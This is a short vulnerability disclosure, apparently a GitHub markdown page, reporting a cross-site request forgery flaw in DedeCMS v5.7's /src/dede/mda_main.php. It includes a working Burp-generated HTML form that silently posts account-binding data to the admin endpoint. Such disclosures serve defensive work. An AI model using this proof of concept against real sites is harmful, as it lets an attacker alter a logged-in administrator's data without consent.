Skip to content

Latest commit

 

History

History
34 lines (25 loc) · 1.21 KB

4.md

File metadata and controls

34 lines (25 loc) · 1.21 KB
Raw

target:https://github.com/wdsunwq/DedeCMSv5 version: v5.7

DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /src/dede/mda_main.php 1

Poc:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/src/dede/mda_main.php?" method="POST">
      <input type="hidden" name="dopost" value="bind&#95;user" />
      <input type="hidden" name="email" value="cs&#64;123&#46;com" />
      <input type="hidden" name="pwd" value="Qwer1234" />
      <input type="hidden" name="domain" value="127&#46;0&#46;0&#46;1" />
      <input type="hidden" name="channel&#95;name" value="�&#136;&#145;�&#154;&#132;�&#189;&#145;�&#171;&#153;" />
      <input type="hidden" name="imageField1&#46;x" value="28" />
      <input type="hidden" name="imageField1&#46;y" value="10" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

2

This operation can complete the modification of the data